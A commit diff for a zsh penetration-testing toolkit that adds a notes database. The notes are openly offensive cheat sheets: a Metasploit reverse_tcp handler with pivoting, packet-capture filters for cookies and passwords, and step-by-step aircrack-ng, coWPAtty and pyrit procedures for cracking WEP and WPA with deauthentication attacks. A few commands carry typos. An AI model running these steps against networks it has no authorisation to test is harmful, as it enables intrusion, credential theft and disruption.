n function and dep checking

2017-01-15 23:23:28 +01:00 · 2017-01-15 23:23:28 +01:00 · 85d6e65b5d
parent 7cdc1d5512
commit 85d6e65b5d
8 changed files with 190 additions and 39 deletions
--- a/README.md
+++ b/README.md
@ -9,22 +9,37 @@ Usability features: tor trigger (ton/tof), external ip check, tor check... and m

 Note: this project is a work in progress which we develop with one of my friend in our free time. If you use it, be prepared for some glitches.

-Works on Debian if the dependencies are met or on Kali. Probably works on Pentoo also.
-
-Installing full console after you have the dependencies: cp profile_files/.* -R ~/
-
-Using only the pentest function can be done by including: pentest_functions.zsh 
+Works on Debian if the dependencies are met or on Kali. Probably works on Pentoo also. If the dependencies are not met, the functions will still run, but outputs will be empty - at least in the currently status.


-Functions
-=========
+Install
+=======

-pawnpls   - Automatically enumerate and start predefined attacks such as brute force.
+Full console install: git clone https://github.com/51x/PTZ && cd PTZ && cp profile_files/.* -R ~/
+
+Using only the pentest functions can be done by including just: pentest_functions.zsh
+If you want also the notes/knowledge database, you shoul add the v3das folder to you ~/.ptz/ folder.
+
+
+General function of PTZ
+=======================
+
+pawnpls   - Automatically enumerate and start predefined attacks such as brute force. Output goes to ~/.ptz/$target/
            Example for single target: autopawn n0nexi-stent.com
            Example for multiple targets: autopawn "n0nex-1.com n0nex-2.com"


-everythingworksornot\? - check if everything works or not for this script (tbd)
+ptzdepchk - check if all dependencies are installed or not, print if something is missing
+
+
+Notes functions
+===============
+
+n         - query notes about a topic, use tab auto complete
+
+nls       - list all the notes
+
+rnd       - get random strings (lengths: 8,16,32,64)


 chk functions
@ -45,12 +60,3 @@ johnzip   - Crack zip files using john

 johnrar   - Crack rar files using john
            Example: johnrar data.rar rockyou.txt
-
-
-help functions
-==============
-
-hlp       - Get help of the hlp command
-hlprnd    - Get random strings (lengths: 8,16,32,64)
-hlp <var> - Get help about <var> - not yet implemented
-i         - Get information about a topic, use tab after i
--- a/profile_files/.ptz/v3das/_n
+++ b/profile_files/.ptz/v3das/_n
@ -0,0 +1,3 @@
+#compdef n
+
+_arguments "1: :( $(ls ~/.ptz/v3das/ ) )"
--- a/profile_files/.ptz/v3das/metasploit_meterpreter_pivoting.txt
+++ b/profile_files/.ptz/v3das/metasploit_meterpreter_pivoting.txt
@ -0,0 +1,17 @@
+# With "autoroute" it is possible to attack through the remote machine.
+
+# Start handler
+use exploit/multi/handler
+set payload windows/meterpreter/reverse_tcp
+set lhost 10.1.1.1
+
+# Add route to which network you want to look into
+run autoroute -s 10.2.2.0/24
+run autoroute -p
+
+# Scan
+use auxiliary/scanner/portscan/tcp 
+set RHOSTS 10.2.2.0/24
+set THREADS 50
+set ports 20,21,22,25,53,69,80,139,443,445,993,8080
+
--- a/profile_files/.ptz/v3das/network_sniffing_tcpdump_examples.txt
+++ b/profile_files/.ptz/v3das/network_sniffing_tcpdump_examples.txt
@ -0,0 +1,7 @@
+
+tcpdump -r file.cap -vvvs 1024 -l -A host example.com | grep -i cookie
+tcpdump -r file.cap -vvvs 1024 -l -A | egrep -i "host:|cookie:"
+tcpdump -r file.cap -s 1024 -l -A dst domain.com
+
+tcpdump -A # show raw data 
+
--- a/profile_files/.ptz/v3das/network_sniffing_tshark_examples.txt
+++ b/profile_files/.ptz/v3das/network_sniffing_tshark_examples.txt
@ -0,0 +1,11 @@
+
+# tshark follow stream
+tshark -r <capture file> -R "<filter>" -T fields -e tcp.stream
+tshark -q -r http.pcapng -z follow,tcp,ascii,1
+
+# etc
+tshark grep from http
+tshark -r file.cap 'http'  | egrep -i "login|pass" 
+tshark  'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)'
+tshark  'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)'  -R'http.request.method == "GET" || http.request.method == "HEAD"'
+
--- a/profile_files/.ptz/v3das/network_switch_cisco_reset.txt
+++ b/profile_files/.ptz/v3das/network_switch_cisco_reset.txt
@ -0,0 +1,7 @@
+
+# reset a cisco switch
+flash_init
+dir flash:
+rename flash:config.text flash:config.backup
+boot
+
--- a/profile_files/.ptz/v3das/network_wireless_cracking_aircrack.txt
+++ b/profile_files/.ptz/v3das/network_wireless_cracking_aircrack.txt
@ -0,0 +1,75 @@
+# cracking WEP with clients
+airmon-ng start wlan0 $AP_CHANNEL
+airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
+aireplay-ng -1 0 -e $AP_ESSID -a $AP_MAC -h $SELF_MAC mon0    # Fake-auth
+aireplay-ng -3 -b $AP_MAC -h $SELF_MAC mon0    # ARP Replay attack
+aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0    # Deauthentication to get an ARP packet faster
+aircrack-ng -0 $CAP_FILE
+
+
+# cracking WEP via a client
+airmon-ng start wlan0 $AP_CHANNEL
+airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
+aireplay-ng -1 0 -e $AP_ESSID -a $AP_MAC -h $SELF_MAC mon0    # Fake auth
+aireplay-ng -2 -b $AP_MAC -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 mon0    # Interactive packet reply attack
+aircrack-ng -0 -z -n 64 $CAP_FILE
+
+
+# clientless WEP cracking
+airmon-ng start wlan0 $AP_CHANNEL
+airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
+aireplay-ng -1 0 -e $AP_ESSID -a $AP_MAC -h $SELF_MAC mon0    # Fake-auth
+aireplay-ng -5 -b $AP_MAC -h $SELF_MAC mon0    # Fragmentation attack for PRGA
+aireplay-ng -4 -b $AP_MAC -h $SELF_MAC mon0    # If Frag attack fails, use Korek ChopChop attack for PRGA
+packetforge-ng -0 -a $AP_MAC -h $SELF_MAC -l $SOURCE_IP -k $DESTINATION_IP -y $XOR_FILENAME -w $PACKET_FILENAME    # After got PRGA
+aireplay-ng -2 -r $PACKET_FILENAME mon0    # Interactive packet reply after crafted the packet
+aircrack-ng -0 $CAP_FILE
+
+
+# bypassing WEP SKA
+airmon-ng start wlan0 $AP_CHANNEL
+airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
+aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0    # Deauthentication attack for PRGA xor file
+aireplay-ng -1 60 -e $AP_ESSID -y $PRGA_FILENAME -a $AP_MAC -h $SELF_MAC mon0    # Shared key fake auth attack
+aireplay-ng -3 -b $AP_MAC -h $SELF_MAC mon0    # ARP Replay attack
+aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0    # Deauthentication to get an ARP packet faster
+aircrack-ng -0 -z -n 64 $CAP_FILE
+
+
+# cracking WPA PSK
+airmon-ng start wlan0 $AP_CHANNEL
+airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
+aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0    # Deauthentication to get a 4 way handshake
+airacrack-ng -0 -w $WORDLIST $CAPTURE_FILE
+
+
+# cracking WPA with John The Ripper
+airmon-ng start wlan0 $AP_CHANNEL
+airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
+aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0    # Deauthentication to get a 4 way handshake
+# change to password folder
+vim john.conf    # Edit "List.Rules:Wordlist" --> add regex for more words eg. "$[0-9]$[0-9]"
+./john --worldlist=$WORDLIST --rules --stdout | aircrack-ng -0 -e $AP_ESSID -w $CAPTURE_FILE
+
+
+# cracking WPA with coWPAtty
+airmon-ng start wlan0 $AP_CHANNEL
+airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
+aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0    # Deauthentication to get a 4 way handshake
+cowpatty -r $CAPTURE_FILE -f $WORDLIST -2 s $AP_ESSID
+genpmk -f $WORDLIST -d HASH_FILENAME -s $AP_ESSID    # Gen WPA hashes for rainbow attack
+cowpatty -r $CAPTURE_FILE -d HASH_FILENAME -2 -s $AP_ESSID    # Start the rainbow attack 
+
+
+# cracking WPA with pyrit
+airmon-ng start wlan0 $AP_CHANNEL
+airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0
+aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0    # Deauthentication to get a 4 way handshake
+pyrit list_cores
+pyrit -r $CAPTURE_FILE -i $WORDLIST -b $AP_MAC attack_passthrough
+
+pyrit -i $WORDLIST import_password    # Import the wordlist to the database
+pyrit -e $AP_ESSID create_essid    # Add ESSID to the database 
+pyrit batch
+pyrit -r $CAPTURE_FILE attack_db
+
--- a/profile_files/.zsh/pentest_functions.zsh
+++ b/profile_files/.zsh/pentest_functions.zsh
@ -1,26 +1,54 @@
+# Experimental version!
+
 debug=1

-function everythingworksornot"?" {
-    echo "really?"
-    # tba: dependency checks for all functions
+fpath=(~/.ptz/v3das $fpath) 
+autoload -U compinit
+compinit
+zstyle ':completion:*' menu select=2
+
+function nls {
+    echo "You can get help from the following topics:"
+    for f in ~/.ptz/v3das/* ; do
+        echo $f | rev | cut -d'/' -f1 | rev |cut -d'.' -f1
+    done
 }


-function i {
+function n {
+    # query knowledgebase, use tab after n
    if [ -d "~/.ptz/v3das" ]
      then
-        cat ~/.ptz/v3das/
+        echo "knowledge base / notes are missing"
+    else
+        cat ~/.ptz/v3das/$1
    fi
 }


-function hlp {
-    echo "this function is not yet implemented"
-    if [ $# -ne 1 ]
-      then
-        echo "this function is not yet implemented"
-        return
-    fi
+function ptzdepchk {
+    # check if dependencies are met or not
+    type john >/dev/null 2>&1 || { echo >&2 "john is missing."; }
+    type zip >/dev/null 2>&1 || { echo >&2 "zip is missing."; }
+    type rar >/dev/null 2>&1 || { echo >&2 "rar is missing."; }
+    type wget >/dev/null 2>&1 || { echo >&2 "wget is missing."; }
+    type openssl >/dev/null 2>&1 || { echo >&2 "openssl is missing."; }
+    type torsocks >/dev/null 2>&1 || { echo >&2 "torsocks is missing."; }
+    type tor >/dev/null 2>&1 || { echo >&2 "tor is missing."; }
+    type traceroute >/dev/null 2>&1 || { echo >&2 "traceroute is missing."; }
+    type theharvester >/dev/null 2>&1 || { echo >&2 "theharvester is missing."; }
+    type dnsenum >/dev/null 2>&1 || { echo >&2 "dnsenum is missing."; }
+    type fierce >/dev/null 2>&1 || { echo >&2 "fierce is missing."; }
+    type nmap >/dev/null 2>&1 || { echo >&2 "nmap is missing."; }
+    type searchsploit >/dev/null 2>&1 || { echo >&2 "searchsploit is missing."; }
+    type unzip >/dev/null 2>&1 || { echo >&2 "unzip is missing."; }
+    #type dig >/dev/null 2>&1 || { echo >&2 "dig is missing."; }
+    #type curl  >/dev/null 2>&1 || { echo >&2 "curl is missing."; }
+    #type arachni >/dev/null 2>&1 || { echo >&2 "arachni is missing."; }
+    #type hydra >/dev/null 2>&1 || { echo >&2 "hydra is missing."; }
+    type  python >/dev/null 2>&1 || { echo >&2 "python is missing."; }
+    #type dirb >/dev/null 2>&1 || { echo >&2 "dirb is missing."; }
+     
 }


@ -35,11 +63,13 @@ function tof {


 function tip {
+    # check if tor is really used or not
    wget -qO- https://check.torproject.org/ -U "Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0" | egrep -i "Congratulations. This browser is configured to use Tor.|Sorry. You are not using Tor." | uniq
 }


 function wip {
+    # check public ip
    if [ $RANDOM -gt $RANDOM ]
        then
            wget -qO- -U "Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0" ipecho.net/plain
@ -52,6 +82,7 @@ function wip {


 function chkhttpz {
+    # http response checks from a given host / port
    echo "HTTP responses"
    wget --spider -S "http://$1:$2/" 2>&1 | grep "HTTP/"

@ -61,19 +92,13 @@ function chkhttpz {


 function chkcrt {
+    # check ssl certificate of a server
    openssl s_client -showcerts -connect $1:$2
 }


-function hlp {
-    echo "You can get help from the following topics:"
-    for f in ~/.ptz/v3das/* ; do
-        echo $f | rev | cut -d'/' -f1 | rev |cut -d'.' -f1
-    done
-}
-
-
-function hlprnd {
+function rnd {
+    # get some random characters
    cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c${1:-8};echo;
    cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c${1:-16};echo;
    cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c${1:-32};echo;